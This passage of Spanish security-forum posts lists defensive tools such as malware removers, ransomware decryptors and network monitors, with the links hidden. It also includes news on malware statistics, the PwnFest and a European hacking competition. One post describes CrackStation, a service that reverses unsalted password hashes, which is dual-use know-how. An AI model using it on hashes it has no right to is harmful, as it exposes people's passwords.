- Guía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Dr.Web:
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Guía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Antibot:

RUBotted:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Rogue: Elimina falsas soluciones de protección instaladas en tu equipo.

ERA Remover:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (32 bits): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (64 bits): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Norton Power Eraser:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Remove Fake Antivirus:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

RogueKiller:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (x32): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (x64): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Guía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fake Antivirus (FakeAV) Removal Tool (Trendmicro):
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
D.Directa (x32): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
D.Directa (x64): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En la página de descargas puedes encontrar la versión para uso por consola.


Ransomware: Desbloquea las modificaciones en sistema y archivos.

Avira Ransom File Unlocker:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

RannohDecryptor:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

RectorDecryptor:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

XoristDecryptor:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Panda Ransomware Decrypt:
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Guía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

CryptoPrevent (Beta):
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
D.Directa (portable): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Cryptolocker Prevention Kit:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

MBR: Analizan y eliminan infecciones en el sector de arranque del disco.

MBR rootkit detector:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Avast aswMBR:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Avira Boot Sector Removal Tool:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

AntiBootkit: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

AVG Bootkit Removal Tool:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

BitDefender Bootkit Removal Tool:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta --> Elegir versión de vuestro sistema, 32 o 64 bits.

LiveCD: Disco de rescate para iniciar antes del inicio del sistema operativo.

Kaspersky Rescue Disc:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Avira Antivir Rescue Disc:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

F-Secure Rescue CD:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta#
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Guía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Máquinas virtuales:

Virtualización completa de sistema:

VirtualBox:
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Guía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

VMware Player:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Guía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Bochs:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Guía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Virtualización de procesos: Virtualiza la ejecución de archivos y documentos en entorno seguro.

Sandboxie:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Guía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Conexiones y redes:
Conexiones:

TCPView:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

CurrentPorts:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (x32): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (x64): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Tráfico de red: Para capturar el tráfico de red es necesario instalar *Winpcap.
La mayoría de instaladores nos darán la opción de instalarlo durante la ejecución.

Wireshark:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (x32): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (x64): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Portable: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Guía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

SmartSniff:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (x32): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (x64): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

HTTPNetworkSniffer:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (x32): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (x64): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

*Winpcap:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 
- Guía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

WiFi:

Wireless Network Watcher:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

WirelessNetView:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Wireless Intrusion Detection Testing Tool (necesario Python):
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Info: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Bluetooth:

BluetoothView:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

DNS:

DNS Changer Detector:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

DNSQuerySniffer:
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (x32): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (x64): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


USB:

Bitdefender USB Immunizer:
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Info: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Panda USB Vaccine:
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Guía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Panda Cloud Cleaner - USB de análisis:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Redes sociales:

Bitdefender Safego: Protege tu cuenta de las redes sociales de todo tipo de e-problemas: estafas, spam, malware y exposición de los datos personales.
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Instalación: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Varios:

RstAssociations: Restaura asociación de archivos.
- Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (exe): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- D.Directa (scr): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Browser Guard 3.0 (Protege tu navegador):
- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

BashLite Malware Scanner:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

ShellShock Vulnerability Scanner:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

NoVirusThanks DLL UnInjector:
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
D.Directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Un saludo :)
#35
Buenas compañeros,estaba copiando documentacion de un libro acerca de la esteganografia y el estegoanalisis para poder compartilo en el foro y cuando llevaba como mas de media hora copiando hice Control R en vez de Control E y se me fue todo el post a la mieeeeeeeeerda,esto ya me habia pasado otras veces sobretodo en unos de mis primeros posts que escribi,aprendi a que cada tiempo debia copiar todo lo que llevaba escrito por si pasaba algo ya lo tenia copiado en el portapapeles pero esta vez lo ultimo que tenia copiado en el portapapeles era un link :( y habia perdido tooooooooooooooooodo lo que habia escrito :( :( y joba el post estaba quedando muy bonito jajaja solo queria proponer una manera para que esto que me ha pasado ami no pase mas o se pueda evitar de alguna de las maneras mediante la configuracion del foro o algo

¿Alguna sugerencia?

Un saludo :)
#36
En concreto, PandaLabs confirma que ha detectado y neutralizado casi 70 millones de nuevas muestras este año, lo que viene a suponer una media de 200.000 al día.

Los laboratorios de Panda Security han detectado este año un incremento del 32,6% de los ataques a teléfonos móviles y tabletas con respecto a 2015, al tiempo que se ha registrado una evolución similar en las técnicas de infección contra estos dispositivos. Estos datos ponen de manifiesto que, a lo largo de 2016, se ha vuelto a batir el record de la mayor cantidad de malware detectado. En total, han sido casi 70 millones de nuevas muestras detectadas y neutralizadas por PandaLabs, con una media de 200.000 al día.

Este incremento de las amenazas coincide con la duplicación de las ventas de comercio electrónico a través del móvil, una tendencia que, según Hervé Lambert, director de Marketing de Producto Retail de la compañía, se mantendrá en los próximos años. "Los malos pondrán mucho esfuerzo en intentar colarse en este tipo de transacciones. Contar con una protección adecuada es imprescindible para comprar con tranquilidad", confirma.

Por este motivo, la compañía ha anunciado el lanzamiento de Panda Protection Advanced para dispositivos ilimitados. Se trata de nueva propuesta comercial que ofrece protección antivirus para los dispositivos Windows y Android, con especial atención a la salvaguarda de las redes Wi-Fi. Asimismo, cuenta con una protección de Internet para los niños por medio de una herramienta de control parental. En palabras de Lambert, "se trata de un nuevo tipo de suscripción, que cuesta 2,99 euros al mes para dispositivos ilimitados y cancelable en cualquier momento, con el fin de ofrecer a todos los clientes una protección multiplataforma y a medida", concluye el directivo.



Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Un saludo Biacheees
#37
Hacking / CrackStation
Noviembre 13, 2016, 08:20:37 PM
¿Qué nos ofrece No tienes permitido ver los links. Registrarse o Entrar a mi cuenta?

El portal No tienes permitido ver los links. Registrarse o Entrar a mi cuenta nos permite crackear los hashes para revelar la contraseña en texto plano, esta herramienta es completamente online y gratuita, nos permitirá crackear las claves hasheadas gracias a una tabla pre-calculada por ellos. De esta forma, si en su tabla tenemos el hash que nosotros hemos introducido, nos mostrará la contraseña automáticamente.


La base de datos donde se almacena hash-contraseña se ha diseñado específicamente para ser muy rápida, de esta forma, conseguir un hash (si existe en dicha tabla) nos llevará segundos. Un detalle muy importante es que este servicio funciona con hash sin "SALT", por lo que deberemos tenerlo muy en cuenta.

Esta herramienta no solo nos permite crackear una contraseña, sino que podemos poner hasta 20 hashes a la vez para que se encargue de darnos los resultados.

Algoritmos hash soportados por No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Actualmente este servicio gratuito soporta los siguientes algoritmos hash: LM, NTLM, md2, md4, md5, md5(md5_hex), md5-half, sha1, sha224, sha256, sha384, sha512, ripeMD160, whirlpool, MySQL 4.1+ (sha1(sha1_bin).

¿Cómo puedo crackear un hash con CrackStation?

Lo primero que tenemos que hacer es entrar en la página web oficial de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, una vez aquí, debemos pegar todos y cada uno de los hash que queremos crackear, a continuación, debemos poner el captcha para poder realizar la solicitud:


Una vez que hemos pinchado en "Crack hashes", nos mostrará los hashes crackeados por la herramienta, de qué tipo es el hash que hemos introducido (MD5, SHA-1 etc.) y por último, la contraseña en texto plano.



Hash Lookup: La herramienta implementada en Python de CrackStation

Si necesitásemos crackear una contraseña en un servidor, y no tuviéramos acceso a Internet o a un navegador web, podemos utilizar la herramienta Hash Lookup. Esta herramienta es una implementación de CrackStation escrita en Python, por lo que podremos ejecutarla de manera local, de hecho, soporta más algoritmos que la versión web de CrackStation.

Podéis acceder al proyecto No tienes permitido ver los links. Registrarse o Entrar a mi cuenta donde encontraréis toda la información, incluyendo el código fuente y la descarga del programa .py para ejecutarlo en vuestro equipo.



fuente:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Un saludo :)
#38
Con ustedes, Lokihardt.

Participantes del evento PwnFest 2016 hackearon al navegador predeterminado de Windows 10, uno de ellos en tan sólo 18 segundos.

Vulnerar un software con el fin de afectar al usuario final podría ser una opción para quienes lograron hackear el navegador Microsoft Edge durante el evento PwnFest 2016, parte de la conferencia Power of Community celebrada en Seúl, Corea del Sur. En su lugar, consiguieron miles de dólares por su fructuosa participación (vía The Register).

El navegador predeterminado de Windows 10 fue hackeado un par de veces mediante la ejecución de código a nivel del sistema, una de ellas por el hacker surcoreano Lokihardt, lográndolo en apenas 18 segundos, mientras que expertos de la firma china Qihoo 360 también hicieron su parte, aunque de forma remota. Ambos recibieron una recompensa de USD$140 mil.

No obstante, los expertos de Qihoo 360 se llevaron el evento tras hackear el software VMware Worstation, por primera vez y de manera exitosa, también sin la interacción del usuario. Por ello, recibieron una jugosa recompensa de USD$150 mil, acumulando un total de USD$290 mil en tan sólo un día de hacking.

Tanto Microsoft como VMware recibieron detalles de la explotación en sus respectivos programas de software, Edge y Workstation, para mitigar las vulnerabilidades. Por su parte, con el reciente Patch Tuesday de Windows 10, la compañía de Redmond publicó un parche de seguridad que evitaría la ejecución de código remoto para obtener los mismos derechos que el usuario actual.

Será cuestión de días para que Microsoft distribuya un nuevo parche de seguridad que ponga punto final a la explotación de la que fue víctima su navegador en el PwnFest 2016, cuyos detalles no fueron revelados públicamente para no exponer a los usuarios.



Fuente:fayerwayer.com

#39
Puntuación final de la competición

Durante el día de ayer se celebró en la ciudad alemana de Düsseldorf la final del European Cyber Security Challenge 2016, que viene a ser algo así como la Eurocopa de hackers. En esta competición, futuras promesas del hacking de varios países de Europa, compiten para demostrar sus habilidades en diferentes aspectos de la seguridad informática: pentesting, solución de agujeros de seguridad, criptografía, ciberataque, defensa...

El equipo español, formado por diez jóvenes talentos en ciberseguridad, han sido los ganadores de esta prestigiosa competición, quedando por delante del resto de países participantes (Estonia, Grecia, Irlanda, Liechtenstein, Suiza, Alemania, Austria, Reino Unido y Rumanía). España se mantuvo en primer lugar durante las tres primeras horas de competición, siendo seguida de cerca y superada en algunos momentos por Rumanía, a la que finalmente se impuso.

La competición, organizada por ENISA, la Agencia Europea para la Seguridad de la Información, está dividida en una serie de pruebas, que van sumando puntos. A lo largo de las horas de competición, los puntos se van sumando en una pantalla, y finalmente se hace el recuento y se valora la actuación de cada equipo.

El equipo español está formado por diez chavales de entre 16 y 30 años, comandados por el entrenador, Antonio Ramos, profesor de postgrados y masters universitarios de seguridad informáticavy presentador de Mundo Hacker. Él es quien se encarga de ponerles pruebas previas, entrenarles y motivarles para el duro desafío al que se enfrentan.

La "selección nacional" de hackers y su entrenador, Antonio Ramos

Los integrantes fueron seleccionados tras participar en el reto CTF (Capture The Flag o Atrapa la bandera) que tuvo lugar en el evento CyberCamp 2015 organizado por INCIBE, el Instituto Nacional de Ciberseguridad. Como requisitos: no disponer de certificaciones profesionales en ciberseguridad u no estar trabajando en el sector.

La competición del ECC se basa también en el modelo CTF: una competición ataque-defensa donde los participantes tienen que descubrir vulnerabilidades y parchearlas para que no puedan ser explotadas por sus contrincantes, además de demostrar sus conocimientos en criptografía, hacking ético e ingeniería inversa para conseguir el mayor número de puntos, atacando a sus oponentes mientras defienden su infraestructura. Por si fuera poco, los participantes deben conocer otras materias, como la radiofrecuencia, para descubrir fugas de información mediante antenas RF. Un auténtico desafío, que no está al alcance de cualquiera, se necesita una gran preparación y muchos conocimientos para hacer frente a estas pruebas. El año pasado, nuestra selección participó por primera vez, quedando en la cuarta posición.





Este tipo de competiciones y de proyectos son necesarios para dar visibilidad y oportunidades a jóvenes promesas de la ciberseguridad. Pero también para dar a conocer este sector, que en unos años demandará millones de puestos de trabajo en todo el mundo, que según las previsiones se quedarán desiertos por falta de profesionales especializados.



Fuente:globbsecurity.com

#40
Muy buenas gente estaba viendo por el foro y tal y me encontre con un Post muy interesante del compañero UND3R este es el post No tienes permitido ver los links. Registrarse o Entrar a mi cuenta el problema es que cuando accedo a los links me aparece lo siguiente:



¿Alguna sugerencia?'

Un saludo